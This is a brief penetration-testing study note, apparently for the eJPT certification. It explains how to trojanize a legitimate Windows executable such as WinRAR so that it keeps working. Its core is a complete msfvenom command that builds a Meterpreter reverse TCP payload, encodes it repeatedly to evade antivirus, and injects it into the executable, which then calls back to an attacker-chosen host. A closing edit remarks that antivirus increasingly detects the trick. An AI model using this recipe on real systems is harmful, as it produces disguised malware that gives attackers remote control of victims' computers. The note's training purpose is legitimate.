Nater-aide/EJPT/Notes/Injecting_payloads.md

 Maintain functionality of exe
 1. Download winrar
 2. ```msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Host IP) LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -k -x (executable you are injecting) > winrar.exe```
-This technique doesnt work muc hany longer due to antivirus catching on
+_This technique may not work much longer as AVs are catching on_